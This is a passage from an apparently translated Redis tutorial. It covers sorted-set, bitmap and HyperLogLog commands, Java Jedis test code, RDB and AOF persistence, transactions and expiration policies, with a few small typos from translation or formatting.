127.0.0.1:6379> RENAME k1 kkkkk1
OK
127.0.0.1:6379> GET k1
(nil)
127.0.0.1:6379> GET kkkkk1
"v1"

12. Only when newkey does not exist, rename the key to newkey

  • RENAMENX key newkey
127.0.0.1:6379> set k1 v1
OK
127.0.0.1:6379> set k2 v2
OK
127.0.0.1:6379> renamenx k1 k2
(integer) 0
127.0.0.1:6379> get k1 
"v1"
127.0.0.1:6379> get k2
"v2"
127.0.0.1:6379> renamenx k1 k3
(integer) 1
127.0.0.1:6379> get k3
"v1"

13. Return the type of value stored in key

  • TYPE key
127.0.0.1:6379> keys *
1) "kkkkk1"
2) "k3"
3) "set2"
4) "set5"
5) "L1"
6) "set1"
7) "k2"
8) "set4"
9) "l1"
127.0.0.1:6379> 
127.0.0.1:6379> TYPE k2
string
127.0.0.1:6379> TYPE l1
list
127.0.0.1:6379> TYPE set1
set

14. Clear all keys

  • FLUSHALL

Operate with caution, equivalent to deleting the database in MySQL

Type 5: Zset ordered set operations

  • Redis ordered sets, like sets, are also collections of string type elements and do not allow duplicate members.
  • It is used to save data that needs to be sorted , such as rankings, Chinese scores of a class, employee salaries of a company, posts on a forum, etc.
  • In an ordered set, each element has a score (weight) to sort the elements.
  • It has three elements: key, member and score. Taking Chinese scores as an example, key is the name of the exam (midterm exam, final exam, etc.), member is the student's name, and score is the score.

1. Add one or more members to an ordered set, or update the score of an existing member

  • ZADD key score1 member1 [score2 member2]
127.0.0.1:6379> ZADD pv_zset 80 page1.html 100 page2.html 160 page3.html
(integer) 3

2. Get the number of members of an ordered set

  • ZCARD key
127.0.0.1:6379> ZCARD pv_zset
(integer) 3

3. Calculate the number of members with a specified interval score in an ordered set

  • ZCOUNT key min max
# 80  page1.html 
# 100 page2.html 
# 160 page3.html
# 60 ~ 110 之间  2个
127.0.0.1:6379> ZCOUNT pv_zset 60 110
(integer) 2

4. Add increment to the score of the specified member in the ordered set

  • ZINCRBY key increment member
127.0.0.1:6379> ZINCRBY pv_zset 10 page1.html
"90"

5. Calculate the intersection of one or more given ordered sets and store the result set in the new ordered set key

  • ZINTERSTORE destination numkeys key [key …]
127.0.0.1:6379> ZADD pv_zset1 10 page1.html 20 page2.html
(integer) 2
127.0.0.1:6379> ZADD pv_zset2 5 page1.html 10 page2.html
(integer) 2
127.0.0.1:6379> ZINTERSTORE pv_zset_result 2 pv_zset1 pv_zset2
(integer) 2

6. Return the members in the specified range of the ordered set through the index range

  • ZRANGE key start stop [WITHSCORES]
127.0.0.1:6379> ZRANGE pv_zset_result 0 -1 WITHSCORES
1) "page1.html"
2) "15"
3) "page2.html"
4) "30"

7. Return the members in the specified interval of the ordered set through scores

  • ZRANGEBYSCORE key min max [WITHSCORES] [LIMIT]
127.0.0.1:6379> ZRANGE pv_zset 0 -1 WITHSCORES
1) "page1.html"
2) "90"
3) "page2.html"
4) "100"
5) "page3.html"
6) "160"
127.0.0.1:6379> ZRANGEBYSCORE pv_zset 95 180
1) "page2.html"
2) "page3.html"

8. Return the index of the specified member in the ordered set

  • ZRANK key member
127.0.0.1:6379> ZRANK pv_zset page1.html
(integer) 0
127.0.0.1:6379> ZRANK pv_zset page3.html
(integer) 2

9. Remove one or more members from an ordered set

  • ZREM key member [member …]
127.0.0.1:6379> ZRANGE pv_zset 0 -1 WITHSCORES
1) "page1.html"
2) "90"
3) "page2.html"
4) "100"
5) "page3.html"
6) "160"
127.0.0.1:6379> ZREM pv_zset page1.html
(integer) 1
127.0.0.1:6379> ZRANGE pv_zset 0 -1 WITHSCORES
1) "page2.html"
2) "100"
3) "page3.html"
4) "160"

10. Return the members in the specified range in the ordered set, through the index, the score is from high to low

  • ZREVRANGE key start stop [WITHSCORES]
127.0.0.1:6379> ZADD pv_zset 120 page1.html 140 page4.html 20 page5.html 300 page6.html
(integer) 4
127.0.0.1:6379> ZRANGE pv_zset 0 -1 WITHSCORES
 1) "page5.html"
 2) "20"
 3) "page2.html"
 4) "100"
 5) "page1.html"
 6) "120"
 7) "page4.html"
 8) "140"
 9) "page3.html"
10) "160"
11) "page6.html"
12) "300"
127.0.0.1:6379> ZREVRANGE pv_zset 0 -1
1) "page6.html"
2) "page3.html"
3) "page4.html"
4) "page1.html"
5) "page2.html"
6) "page5.html"

11. Returns the ranking of the specified member in the ordered set. The members of the ordered set are sorted by decreasing score (from large to small)

  • ZREVRANK key member
# 排序包含0
127.0.0.1:6379> ZREVRANK pv_zset page6.html
(integer) 0
127.0.0.1:6379> ZREVRANK pv_zset page4.html
(integer) 2
127.0.0.1:6379> ZREVRANK pv_zset page5.html
(integer) 5

12. Return the score value of the member in the ordered set

  • ZSCORE key member
127.0.0.1:6379> ZSCORE pv_zset page3.html
"160"
127.0.0.1:6379> ZSCORE pv_zset page5.html
"20"

Bitmap operations

  • The smallest storage unit of a computer is a bit. Bitmaps are for bit operations and are more space-saving than String, Hash, Set and other storage methods.
  • Bitmaps are not a data structure. The operation is based on the String structure. A String can store up to 512M, so a Bitmaps can set 232 bits .
  • Bitmaps provides a separate set of commands, so using Bitmaps in Redis is not the same as using strings. You can think of Bitmaps as an array in bits. Each unit of the array can only store 0 and 1. The subscript of the array is called an offset in Bitmaps.
  • An example of the BitMaps command: store each independent user in Bitmaps whether they have visited the website, record the visited user as 1, and the user who has not visited as 0, and use the offset as the user's ID

1.Set Bit value

  • SETBIT key offset value

The vlaue set by the setbit command can only be 0 or 1.

127.0.0.1:6379> setbit unique:users:2022-09-12 1 1
(integer) 0
127.0.0.1:6379> setbit unique:users:2022-09-12 2 1
(integer) 0
127.0.0.1:6379> setbit unique:users:2022-09-12 3 1
(integer) 0
127.0.0.1:6379> setbit unique:users:2022-09-12 4 0
(integer) 0
# unique:users:2022-09-12 -> 定义用户某日的标记
# 1,2,3,4可以是用户的UID等标记
# 1 代表用户访问 0代表未访问

2. Get the Bit value

  • GETBIT key offset
127.0.0.1:6379> getbit unique:users:2022-09-12 3
(integer) 1
127.0.0.1:6379> getbit unique:users:2022-09-12 4
(integer) 0

3. Get the number of Bitmaps with a specified range value of 1

  • BITCOUNT key [start end]

Assuming that there is a lot of data in the database and counting the records that users have accessed on that day, you only need to count the total number of 1

127.0.0.1:6379> bitcount unique:users:2022-09-12
(integer) 3

4.Operations between Bitmaps

  • BITOP operation destkey key [key, …]
127.0.0.1:6379> setbit unique:users:2022-09-13 1 0
(integer) 0
127.0.0.1:6379> setbit unique:users:2022-09-13 2 1
(integer) 0
127.0.0.1:6379> setbit unique:users:2022-09-13 3 1
(integer) 0
127.0.0.1:6379> setbit unique:users:2022-09-13 4 1
(integer) 0
# 2022-09-12 1 1
# 2022-09-12 2 1  **
# 2022-09-12 3 1  **
# 2022-09-12 4 0

# 2022-09-13 1 0
# 2022-09-13 2 1  **
# 2022-09-13 3 1  **
# 2022-09-13 4 1
# 统计出连续两天都为1的结果(2)
127.0.0.1:6379> bitop and unique:users:and:2022-09-12and13 unique:users:2022-09-12 unique:users:2022-09-13
(integer) 1
127.0.0.1:6379> bitcount unique:users:and:2022-09-12and13
(integer) 2
# 统计出连续两天中任意一天有1的结果(4)
127.0.0.1:6379> bitop or unique:users:or:2022-09-12or13 unique:users:2022-09-12 unique:users:2022-09-13
(integer) 1
127.0.0.1:6379> bitcount unique:users:or:2022-09-12or13
(integer) 4

Operations on HyperLogLog structure

HyperLogLog is often used for statistics of large amounts of data, such as page visit statistics or user visit statistics.

​ The syntax used by HyperLogLog integrated with Redis mainly includes pfadd and pfcount. As the name suggests, one is for adding data and the other is for statistics. Why use pf? It is because the inventor of the HyperLogLog data structure is Professor Philippe Flajolet, so the English abbreviation of the inventor is used.

  • pathd
  • pfcount
    • pfadd and pfcount are commonly used in statistics
127.0.0.1:6379> pfadd uv user1
(integer) 1
127.0.0.1:6379> keys *
1) "uv"
127.0.0.1:6379> pfcount uv
(integer) 1
127.0.0.1:6379> pfadd uv user2
(integer) 1
127.0.0.1:6379> pfadd uv user3
(integer) 1
127.0.0.1:6379> pfadd uv user4
(integer) 1
127.0.0.1:6379> pfcount uv
(integer) 4
127.0.0.1:6379> pfadd uv user5 user6 user7 user8 user9 user10
(integer) 1
127.0.0.1:6379> pfcount uv
(integer) 10
127.0.0.1:6379> pfadd page1 user1 user2 user3 user4 user5
(integer) 1
127.0.0.1:6379> pfadd page2 user1 user2 user3 user6 user7
(integer) 1
127.0.0.1:6379> pfmerge page1+page2 page1 page2
OK
127.0.0.1:6379> pfcount page1+page2
(integer) 7

Why HyperLogLog is suitable for statistics of large amounts of data

  • Redis HyperLogLog is an algorithm used for cardinality statistics. The advantage of HyperLogLog is that when the number or volume of input elements is very large, the space required to calculate the cardinality is always fixed and very small.
  • In Redis, each HyperLogLog key only requires 12 KB of memory to calculate the cardinality of nearly 2 64 different elements. This is in sharp contrast to a collection that consumes more memory when calculating cardinality. The more elements there are, the more memory is consumed.
  • Because HyperLogLog only calculates the cardinality based on the input elements and does not store the input elements themselves, HyperLogLog cannot return individual elements of the input like a collection.

What is cardinality?

For example: Data set {1, 3, 5, 7, 5, 7, 8}, then the cardinality set of this data set is {1, 3, 5, 7, 8}, and the cardinality is 5 (the number of non-repeating elements) . Cardinality estimation is to quickly calculate the cardinality within the acceptable error range.

[Chapter 5]-Redis java api data development operations

Redis can be operated not only through the command line, but also through Java API. By using Java API, you can operate various data types in the Redis database.

Development environment preparation

Create a maven project to configure pom dependencies

groupId

  • cn.wangting

artifactId

  • redis_op

pom configuration file

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>cn.wangting</groupId>
    <artifactId>redis_op</artifactId>
    <version>1.0-SNAPSHOT</version>
    <dependencies>
        <dependency>
            <groupId>redis.clients</groupId>
            <artifactId>jedis</artifactId>
            <version>2.9.0</version>
        </dependency>
        <dependency>
            <groupId>junit</groupId>
            <artifactId>junit</artifactId>
            <version>4.12</version>
            <scope>test</scope>
        </dependency>
        <dependency>
            <groupId>org.testng</groupId>
            <artifactId>testng</artifactId>
            <version>6.14.3</version>
            <scope>test</scope>
        </dependency>
    </dependencies>
    <build>
        <plugins>
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-compiler-plugin</artifactId>
                <version>3.0</version>
                <configuration>
                    <source>1.8</source>
                    <target>1.8</target>
                    <encoding>UTF-8</encoding>
                    <!--    <verbal>true</verbal>-->
                </configuration>
            </plugin>
        </plugins>
    </build>
    
</project>

Create packages and experimental classes

Create cn.wangting.redis.api_test package structure in the test directory
and create the RedisTest class

Because subsequent tests need to frequently use Redis connections, we first create a JedisPool to obtain Redis connections. Here, we test various APIs based on TestNG. Use @BeforeTest to create a Redis connection pool before executing the test case. Use @AfterTest to close the connection pool after executing the test case.

Implementation steps:

  1. Create a JedisPoolConfig configuration object and specify a maximum idle connection of 10, a maximum waiting time of 3000 milliseconds, a maximum number of connections of 50, and a minimum of 5 idle connections.

  2. Create JedisPool

  3. Use the @Test annotation to write test cases and view all keys in Redis

    • Get Redis connection from Redis connection pool
    • Call the keys method to get all keys
    • Traverse and print all keys

RedisTest

package cn.wangting.redis.api_test;
import org.junit.After;
import org.testng.annotations.AfterTest;
import org.testng.annotations.BeforeTest;
import org.testng.annotations.Test;
import redis.clients.jedis.Jedis;
import redis.clients.jedis.JedisPool;
import redis.clients.jedis.JedisPoolConfig;
import java.util.List;
import java.util.Set;


public class RedisTest {
    
    

    private JedisPool jedisPool;
    private JedisPoolConfig config;

    @BeforeTest
    public void redisConnectionPool(){
    
    
        config = new JedisPoolConfig();
        config.setMaxIdle(10);
        config.setMaxWaitMillis(3000);
        config.setMaxTotal(50);
        config.setMinIdle(5);
        jedisPool = new JedisPool(config, "8.130.25.36", 6379);
    }

    // 功能测试
    public static void main(String[] args) {
    
    
        System.out.println("hello redis!");
    }

    

    @AfterTest
    public void closePool(){
    
    
        jedisPool.close();
    }

}

Run debugging. If the console outputs hello redis!, the environment is ready.

API operates string type data

Implement the following requirements through API operations:

  1. Add a string type data, the key is pv, used to save the value of pv, the initial value is 0

  2. Query the data corresponding to the key

  3. Modify pv to 1000

  4. Implement atomic auto-increment operation of plastic data +1

  5. Implement the atomic auto-increment operation of shaping the data +1000

Current command line redis situation

[root@wangting ~]# redis-cli 
127.0.0.1:6379> keys *
1) "a"
2) "c"
127.0.0.1:6379> 

string operation code RedisTest

package cn.wangting.redis.api_test;
import org.junit.After;
import org.testng.annotations.AfterTest;
import org.testng.annotations.BeforeTest;
import org.testng.annotations.Test;
import redis.clients.jedis.Jedis;
import redis.clients.jedis.JedisPool;
import redis.clients.jedis.JedisPoolConfig;
import java.util.List;
import java.util.Set;


public class RedisTest {
    
    

    private JedisPool jedisPool;
    private JedisPoolConfig config;

    @BeforeTest
    public void redisConnectionPool(){
    
    
        config = new JedisPoolConfig();
        config.setMaxIdle(10);
        config.setMaxWaitMillis(3000);
        config.setMaxTotal(50);
        config.setMinIdle(5);
        jedisPool = new JedisPool(config, "8.130.25.36", 6379);
    }

    // 功能测试
    @Test
    public void stringOpTest() {
    
    
        Jedis connection = jedisPool.getResource();
        // 1.  添加数据
        connection.set("pv", "0");

        // 2.  查询数据
        System.out.println("原始pv为:" + connection.get("pv"));

        // 3.  修改数据
        connection.set("pv", "1000");
        System.out.println("修改pv为:" + connection.get("pv"));

        // 4.  实现整形数据原子自增操作 +1
        connection.incr("pv");
        System.out.println("pv自增1:" + connection.get("pv"));

        // 5.  实现整形该数据原子自增操作 +1000
        connection.incrBy("pv", 1000);
        System.out.println("pv自增1000:" + connection.get("pv"));

    }
    
    @AfterTest
    public void closePool(){
    
    
        jedisPool.close();
    }

}

[Note]: In order to control the length, only part of the @Test code block will be posted later.

Console output:

原始pv为:0
修改pv为:1000
pv自增1:1001
pv自增1000:2001

===============================================
Default Suite
Total tests run: 1, Failures: 0, Skips: 0
===============================================

Check the redis situation on the command line again

127.0.0.1:6379> keys *
1) "a"
2) "pv"
3) "c"
127.0.0.1:6379> get pv
"2001"

API operates hash type data

Implement the following requirements through API operations:

  1. Add the following product inventory to the Hash structure

    • iphone11 => 10000
    • macbookpro => 9000
  2. Get all products in Hash

  3. Added 3,000 macbookpros to inventory

  4. Delete the entire Hash data

Check the redis situation from the command line

127.0.0.1:6379> keys *
(empty array)
@Test
public void hashOpTest() {
    
    
    Jedis connection = jedisPool.getResource();

    // 1.  往Hash结构中添加以下商品库存
    connection.hset("goodsStore", "iphone11", "10000");
    connection.hset("goodsStore", "macbookpro", "9000");

    // 2.  获取Hash中所有的商品
    Map<String, String> keyValues = connection.hgetAll("goodsStore");
    for (String s : keyValues.keySet()) {
    
    
        System.out.println(s + " => " + keyValues.get(s));
    }
}

Check the redis situation from the command line

127.0.0.1:6379> keys *
1) "goodsStore"
127.0.0.1:6379> HGETALL goodsStore
1) "iphone11"
2) "10000"
3) "macbookpro"
4) "9000"

API operates list type data

Implement the following requirements through API operations:

  1. Insert the following three mobile phone numbers to the left of the list: 13844556677, 13644556677, 13444556677

  2. Remove a mobile number from the right

  3. Get all values ​​of list

Check the redis situation from the command line

127.0.0.1:6379> keys *
1) "goodsStore"
127.0.0.1:6379> 
@Test
public void listOpTest() {
    
    
    Jedis connection = jedisPool.getResource();
    // 1.  向list的左边插入以下三个手机号码:13844556677、13644556677、13444556677
    connection.lpush("telephone", "13844556677", "13644556677", "13444556677");

    // 2.  从右边移除一个手机号码
    connection.rpop("telephone");

    // 3.  获取list所有的值
    List<String> telList = connection.lrange("telephone", 0, -1);
    for (String tel : telList) {
    
    
        System.out.print(tel + " ");
    }
}

Check the redis situation from the command line

127.0.0.1:6379> keys *
1) "goodsStore"
2) "telephone"
127.0.0.1:6379> LRANGE telephone 0 -1
1) "13444556677"
2) "13644556677"
127.0.0.1:6379> 

API operates set type data

Implement the following requirements through API operations:

  1. Add the UV of page page1 to a set, and user user1 visits the page once.

  2. user2 visits this page once

  3. user1 visits the page again

  4. Finally get the uv value of page1

Check the redis situation from the command line

127.0.0.1:6379> keys *
1) "goodsStore"
2) "telephone"
127.0.0.1:6379> 
@Test
public void setOpTest() {
    
    
    Jedis connection = jedisPool.getResource();

    // 1.  往一个set中添加页面 page1 的uv,用户user1访问一次该页面
    connection.sadd("page1", "user1");

    // 2.  user2访问一次该页面
    connection.sadd("page1", "user2");

    // 3.  user1再次访问一次该页面
    connection.sadd("page1", "user1");

    // 4.  最后获取 page1的uv值
    Long uv = connection.scard("page1");
    System.out.println("page1页面的UV为:" + uv);
}

Check the redis situation from the command line

127.0.0.1:6379> keys *
1) "goodsStore"
2) "page1"
3) "telephone"
127.0.0.1:6379> SMEMBERS page1
1) "user2"
2) "user1"
127.0.0.1:6379> 

Complete code:

package cn.wangting.redis.api_test;
import org.junit.After;
import org.testng.annotations.AfterTest;
import org.testng.annotations.BeforeTest;
import org.testng.annotations.Test;
import redis.clients.jedis.Jedis;
import redis.clients.jedis.JedisPool;
import redis.clients.jedis.JedisPoolConfig;
import java.util.List;
import java.util.Map;
import java.util.Set;

public class RedisTest {
    
    

    private JedisPool jedisPool;
    private JedisPoolConfig config;

    @BeforeTest
    public void redisConnectionPool(){
    
    
        config = new JedisPoolConfig();
        config.setMaxIdle(10);
        config.setMaxWaitMillis(3000);
        config.setMaxTotal(50);
        config.setMinIdle(5);
        jedisPool = new JedisPool(config, "8.130.25.36", 6379);
    }

    // 功能测试
    @Test
    public void stringOpTest() {
    
    
        Jedis connection = jedisPool.getResource();
        // 1.  添加一个string类型数据,key为pv,初始值为0
        connection.set("pv", "0");

        // 2.  查询该key对应的数据
        System.out.println("原始pv为:" + connection.get("pv"));

        // 3.  修改pv为1000
        connection.set("pv", "1000");
        System.out.println("修改pv为:" + connection.get("pv"));

        // 4.  实现整形数据原子自增操作 +1
        connection.incr("pv");
        System.out.println("pv自增1:" + connection.get("pv"));

        // 5.  实现整形该数据原子自增操作 +1000
        connection.incrBy("pv", 1000);
        System.out.println("pv自增1000:" + connection.get("pv"));
    }

    @Test
    public void hashOpTest() {
    
    
        Jedis connection = jedisPool.getResource();

        // 1.  往Hash结构中添加以下商品库存
        connection.hset("goodsStore", "iphone11", "10000");
        connection.hset("goodsStore", "macbookpro", "9000");

        // 2.  获取Hash中所有的商品
        Map<String, String> keyValues = connection.hgetAll("goodsStore");
        for (String s : keyValues.keySet()) {
    
    
            System.out.println(s + " => " + keyValues.get(s));
        }
    }

    @Test
    public void listOpTest() {
    
    
        Jedis connection = jedisPool.getResource();
        // 1.  向list的左边插入以下三个手机号码:13844556677、13644556677、13444556677
        connection.lpush("telephone", "13844556677", "13644556677", "13444556677");

        // 2.  从右边移除一个手机号码
        connection.rpop("telephone");

        // 3.  获取list所有的值
        List<String> telList = connection.lrange("telephone", 0, -1);
        for (String tel : telList) {
    
    
            System.out.print(tel + " ");
        }
    }

    @Test
    public void setOpTest() {
    
    
        Jedis connection = jedisPool.getResource();

        // 1.  往一个set中添加页面 page1 的uv,用户user1访问一次该页面
        connection.sadd("page1", "user1");

        // 2.  user2访问一次该页面
        connection.sadd("page1", "user2");

        // 3.  user1再次访问一次该页面
        connection.sadd("page1", "user1");

        // 4.  最后获取 page1的uv值
        Long uv = connection.scard("page1");
        System.out.println("page1页面的UV为:" + uv);
    }
    
    @AfterTest
    public void closePool(){
    
    
        jedisPool.close();
    }
}

[Chapter 6]-Redis data persistence

RDB persistence

Introduction to RDB persistence

Redis will regularly save data snapshots to an rbd file, and automatically load the rdb file at startup to restore previously saved data. The timing for Redis to save snapshots can be configured in the configuration file:

# save [seconds] [changes]
# 意为在seconds秒内如果发生了changes次数据修改,则进行一次RDB快照保存

save 60 100
# 会让Redis每60秒检查一次数据变更情况,如果发生了100次或以上的数据变更,则进行RDB快照保存
  • Multiple save instructions can be configured to allow Redis to execute multi-level snapshot saving strategies.

  • Redis enables RDB snapshots by default

  • You can also manually trigger RDB snapshot saving through the SAVE or BGSAVE command.

  • Both SAVE and BGSAVE commands call the rdbSave function, but they call it in different ways.

    • SAVE calls rdbSave directly, blocking the main Redis process until the save is completed. While the main process is blocked, the server cannot handle any requests from the client.
    • BGSAVE then forks a child process, and the child process is responsible for calling rdbSave, and after the save is completed, it sends a signal to the main process to notify that the save has been completed. The Redis server can still continue to process client requests during BGSAVE execution.

RDB persistence advantages

  1. The impact on performance is minimal. Redis will fork out the child process when saving RDB snapshots, which will hardly affect the efficiency of Redis in processing client requests.

  2. Each snapshot will generate a complete data snapshot file, so other means can be used to save snapshots at multiple points in time (such as backing up snapshots at 0:00 every day to other storage media) as a very reliable disaster recovery method.

  3. Data recovery using RDB files is much faster than using AOF

Disadvantages of RDB persistence

  1. Snapshots are generated regularly, so some data will be lost more or less when Redis crashes.

  2. If the data set is very large and the CPU is not powerful enough (such as a single-core CPU), Redis may take a relatively long time when forking the child process, affecting Redis's ability to provide external services.

RDB persistence configuration

View the redis configuration file redis.conf

[root@wangting redis]# vim redis.conf
dir /var/lib/redis
save 900 1
save 300 10
save 60 10000

You can see that the redis configuration file configures three storage mechanisms by default.

backup file:

[root@wangting redis]# ll /root/redis/data/
total 4
-rw-r--r-- 1 redis redis 215 Sep 13 14:41 dump.rdb

AOF persistence

Introduction to AOF persistence

When using AOF persistence, Redis will record every write request in a log file. When Redis restarts, all write operations recorded in the AOF file will be executed sequentially to ensure that the data is restored to the latest

AOF persistence advantages

  1. The safest. When appendfsync is enabled to always, any written data will not be lost. When appendfsync everysec is enabled, only 1 second of data will be lost at most.

  2. AOF files will not be damaged when problems such as power outages occur. Even if a certain log is only half written, it can be easily repaired using the redis-check-aof tool.

  3. AOF files are easy to read and can be modified. After performing some erroneous data clearing operations, as long as the AOF file is not rewritten, you can back up the AOF file, delete the erroneous commands, and then restore the data.

AOF persistence disadvantages

  1. AOF files are generally larger than RDB files

  2. Performance consumption is higher than RDB

  3. Data recovery is slower than RDB

Redis's data persistence itself will cause delays, and a reasonable persistence strategy needs to be formulated based on the security level and performance requirements of the data:

  • Although the setting of AOF + fsync always can absolutely ensure data security, each operation will trigger fsync once, which will have a significant impact on the performance of Redis.

  • AOF + fsync every second is a better compromise, fsync once per second

  • AOF + fsync never will provide the best performance under the AOF persistence solution

Using RDB persistence usually provides higher performance than using AOF, but you need to pay attention to the policy configuration of RDB

AOF persistence turned on

Redis has RDB turned on by default, but AOF is turned off by default. If you want to turn on the function yourself, configure the configuration file as follows:

appendonly yes

AOF persistence configuration

appendfilename "appendonly.aof"
appendfsync everysec

AOF provides three fsync configurations: always/everysec/no, specified through the configuration item [appendfsync]:

  1. appendfsync no : No fsync is performed, and the timing of flushing the file is left to the OS to decide, which is the fastest.

  2. appendfsync always : perform an fsync operation every time a log is written, with the highest data security but the slowest speed

  3. appendfsync everysec : A compromise approach, leaving it to the background thread to fsync once per second

Restart redis after configuration

[root@wangting redis]# redis-cli 
127.0.0.1:6379> set k1 v1
OK
127.0.0.1:6379> set k2 v2
OK
127.0.0.1:6379> set k3 v3
OK
127.0.0.1:6379> exit

View the appendonly.aof file

[root@wangting redis]# ll /root/redis/data
total 8
-rw-r--r-- 1 redis redis 110 Sep 13 15:40 appendonly.aof
-rw-r--r-- 1 redis redis 118 Sep 13 15:40 dump.rdb
[root@wangting redis]# cat appendonly.aof 
*2
$6
SELECT
$1
0
*3
$3
set
$2
k1
$2
v1
*3
$3
set
$2
k2
$2
v2
*3
$3
set
$2
k3
$2
v3

Unlike the dump.rdb file, appendonly.aof can directly view the file content

AOF persistence rewrite

As AOF continues to record write operation logs, because all write operations will be recorded, some useless logs will inevitably appear. A large number of useless logs will make the AOF file too large and the data recovery time will be too long. However, Redis provides the AOF rewrite function, which can rewrite AOF files and only retain the minimum set of write operations that can restore the data to the latest state.

AOF rewrite can be triggered by the BGREWRITEAOF command, or Redis can be configured to do it automatically on a regular basis:

auto-aof-rewrite-percentage 100
auto-aof-rewrite-min-size 64mb
  • Redis will record the AOF log size after completing the rewrite every time AOF rewrite is completed. When the AOF log size increases by 100% on this basis, AOF rewrite will be automatically performed.

  • auto-aof-rewrite-min-size The initial AOF file must trigger this file before it is triggered. Each subsequent rewrite will not be based on this variable. This variable is only valid when initializing and starting Redis.

Redis fork operation

​Every RDB snapshot and AOF Rewrite requires the Redis main process to perform a fork operation. The fork operation itself may take a long time, which is related to the size of the CPU and the memory occupied by Redis. Reasonably configure the RDB snapshot and AOF Rewrite timing according to the specific situation to avoid delays caused by too frequent forks.

​ When Redis forks a child process, it needs to copy the memory paging table to the child process. Taking a Redis instance that occupies 24GB of memory as an example, a total of 48MB of data needs to be copied.

[Chapter 7]-Advanced use of Redis

Redis transaction

Introduction to Redis transactions

The essence of a Redis transaction is a collection of commands. Transactions support executing multiple commands at one time, and all commands in a transaction will be serialized. During the transaction execution process, the commands in the queue will be executed serially in order, and command requests submitted by other clients will not be inserted into the transaction execution command sequence.

A Redis transaction is a one-time, sequential, and exclusive execution of a series of commands in a queue.

  • Redis transactions have no concept of isolation level
    • The batch operation is put into the queue cache before sending the EXEC command and will not be actually executed. Therefore, there is no query within the transaction to see the updates in the transaction, and queries outside the transaction cannot see it.
  • Redis does not guarantee atomicity
    • In Redis, a single command is executed atomically, but transactions are not guaranteed to be atomic and there is no rollback. If any command in the transaction fails to execute, the remaining commands will still be executed.

A transaction will go through the following three stages from start to execution:

  • Phase 1: Start the transaction

  • The second stage: order to join the team

  • The third stage, execution affairs

Redis transaction related commands:

  • MULTI

When the transaction is started, redis will put subsequent commands into the queue one by one, and then use the EXEC command to atomically execute the command queue.

  • EXEC

Execute all operation commands in the transaction

  • DISCARD

Cancel the transaction and abandon execution of all commands in the transaction block

  • WATCH

Monitor one or more keys. If this key (or keys) is modified by other commands before the transaction is executed, the transaction will be interrupted and no commands in the transaction will be executed.

  • UNWATCH

Cancel WATCH monitoring of all keys

Redis transaction operations
  • Start transaction operation
# MULTI开始一个事务:给k1、k2分别赋值,在事务中修改k1、k2,执行事务后,查看k1、k2值都被修改
127.0.0.1:6379> FLUSHALL
OK
127.0.0.1:6379> keys *
(empty array)
127.0.0.1:6379> set k1 v1
OK
127.0.0.1:6379> set k2 v2
OK
127.0.0.1:6379> multi
OK
127.0.0.1:6379(TX)> set k1 11
QUEUED
127.0.0.1:6379(TX)> set k2 22
QUEUED
127.0.0.1:6379(TX)> exec
1) OK
2) OK
127.0.0.1:6379> get k1
"11"
127.0.0.1:6379> get k2
"22"
127.0.0.1:6379> 
  • Transaction failure processing syntax error
# 事务失败处理:语法错误(编译器错误),在开启事务后,修改k1值为11,k2值为22,但k2语法错误,最终导致事务提交失败,k1、k2保留原值
127.0.0.1:6379> FLUSHDB
OK
127.0.0.1:6379> keys *
(empty array)
127.0.0.1:6379> set k1 v1
OK
127.0.0.1:6379> set k2 v2
OK
127.0.0.1:6379> multi
OK
127.0.0.1:6379(TX)> set k1 111
QUEUED
127.0.0.1:6379(TX)> settt k2 222
(error) ERR unknown command `settt`, with args beginning with: `k2`, `222`, 
127.0.0.1:6379(TX)> exec
(error) EXECABORT Transaction discarded because of previous errors.
127.0.0.1:6379> get k1
"v1"
127.0.0.1:6379> get k2
"v2"
127.0.0.1:6379> 

It can be seen that after the transaction is opened, there is a syntax error and the command does not report an error. The final transaction operation of k1 and k2 to modify the data fails, and k1 and k2 are both the original values. The command is detected before entering the QUEUED queue.

  • Failure processing type error when transaction is running
127.0.0.1:6379> flushdb
OK
127.0.0.1:6379> keys *
(empty array)
127.0.0.1:6379> set k1 v1
OK
127.0.0.1:6379> set k2 v2
OK
127.0.0.1:6379> multi
OK
127.0.0.1:6379(TX)> set k1 v111
QUEUED
127.0.0.1:6379(TX)> lpush k2 v222
QUEUED
127.0.0.1:6379(TX)> exec
1) OK
2) (error) WRONGTYPE Operation against a key holding the wrong kind of value
127.0.0.1:6379> get k1
"v111"
127.0.0.1:6379> get k2
"v2"

Redis type error (runtime error). After starting the transaction, modify the k1 value to 11 and the k2 value to 22, but use the type of k2 as List. The type error is detected at runtime, which ultimately causes the transaction submission to fail. At this time, the transaction is terminated. There is no rollback, but the error command is skipped and the execution continues. As a result, the value of k1 changes and k2 retains the original value.

  • Cancel transaction DISCARD
127.0.0.1:6379> multi
OK
127.0.0.1:6379(TX)> set k1 v1
QUEUED
127.0.0.1:6379(TX)> set k2 v2
QUEUED
127.0.0.1:6379(TX)> set k3 v3
QUEUED
127.0.0.1:6379(TX)> discard
OK
127.0.0.1:6379> get k1
(nil)
127.0.0.1:6379> keys *
(empty array)
Reasons why Redis transaction rollback is not supported

Most transaction failures are caused by syntax errors or data structure type errors. Syntax errors are detected before the command is queued, while type errors are detected during execution. Redis uses this simple transaction to improve performance. , which is different from relational databases, special attention should be paid to the distinction. The reason why Redis maintains such a simple transaction is entirely to ensure the core issue under high concurrency - performance.

Redis expiration policy

​ Redis is a key-value database, and you can set the expiration time of keys cached in Redis. The expiration policy of Redis refers to how Redis handles it when the cached key in Redis expires.
There are usually three types of expiration strategies:

  • Timed expiration
    Each key with an expiration time needs to create a timer, which will be cleared immediately when the expiration time is reached. This strategy can immediately clear expired data and is very memory-friendly; however, it will occupy a large amount of CPU resources to process expired data, thus affecting the cache response time and throughput.
  • Lazy expiration:
    Only when a key is accessed, it will be judged whether the key has expired, and it will be cleared when it expires. This strategy can save CPU resources to the maximum extent, but it is very unfriendly to memory. In extreme cases, a large number of expired keys may not be accessed again, thus not being cleared and occupying a large amount of memory.
  • Periodic expiration
